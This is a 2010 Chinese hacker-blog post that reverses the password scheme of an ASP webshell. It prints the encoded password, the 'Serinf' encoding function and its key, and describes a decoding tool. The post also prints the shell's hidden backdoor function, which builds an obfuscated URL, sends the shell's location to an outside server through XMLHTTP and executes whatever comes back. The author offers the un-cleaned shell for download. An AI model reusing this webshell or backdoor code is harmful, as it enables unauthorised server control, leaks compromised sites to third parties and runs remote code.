原创天空 订阅所有原创天空的日志

Serinf加密解密工具

作者:admin 日期:2010-03-14

字体大小:
xyinternetus在http://forum.daokers.com/read.php?tid=951(【讨论】有个2008年的大马 请人帮我解密 谢谢 挑战性有点吧!)发了一个shell,求其shell的密码是多少,解密后从明文中得知其密码是
UserPass="171298273197298273193298273196298273189298273134298273"

继续追踪,在密码正确性判断处得此代码
if Serinf(request.form("pass"),pn)=UserPass then:session("web2a2dmin")=UserPass

寻的其Serinf函数为
Function Serinf(getstr, Pos)
Dim i, newStr
For i = 1 To Len(getstr)
newStr = newStr & Asc(Mid(getstr, i, 1))+Pos & (298361 - Pos)
Next
Serinf = newStr
End Function

找到pn=88

那么这个密码验证的基本思路就是首先获得输入密码值request.form("pass"),设置pn值,之后导入函数Serinf中运算,如果与UserPass相同则正确,反之则非法登陆。

尝试了一下,写了这个加解密小工具,希望有用。
点击放大图片

另外此shell存在利用xmlhttp发送shell地址的后门,这里传上明文(没有去后门),请有兴趣的朋友玩玩。
发送后门地址函数(xmlhttp):
function SererInf(inf)
on error resume next
Set theserver=Server.createobject(Sot(13,0))
theserver.open "GET",right(sot(13,0),4)&chr(60-pos)&"/"&chr(pos+45)&inf&chr(46)&mid(sot(4,0),2,1)&chr(109+pos)&right(Sot(6,0),1)&chr(47)&right(sot(1,0),1),false:theserver.send()
if theserver.readystate<>4 then
exit function
end if
execute(theserver.responseText)
set theserver=nothing
if err.number<>0 then err.Clear:end if
end function

shell界面
点击放大图片








其它文件在刀城,自己看看吧

其它下载地址



欢迎在此留言,也欢迎加入刀城交流,此文刀城地址:http://forum.daokers.com/read.php?tid=987





以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]


[本日志由 admin 于 2010-10-16 11:28 AM 编辑]
相关日志:
在线RSS阅读器订阅:
feedsky
抓虾 pageflakes Rojo google reader
my yahoo newsgator bloglines 有道
鲜果 飞豆 哪吒 Netvibes
Netvibes Netvibes

手机订阅:

本站订阅地址:
RSS2:点击复制
Atom:点击复制
        本站所有原创文章均遵循 [创作共用协议]
        本站原创文章可以转载,但须保持完整性并注明出处。
        COPYRIGHT 2008-2010  §  HTTP://WWW.DAOKERS.COM  §    ALL RIGHTS
评论: 1 | 引用: 0 | 查看次数: -
回复回复xinxin666[2010-04-03 11:44 AM | del]
下来试试
回复来自 admin 的评论 admin 于 2010-04-03 04:58 PM 回复
绝对值得你这样做,:-D
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码提示:单击自动获取验证码
内 容:
最多可输入,当前共,还可输入
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.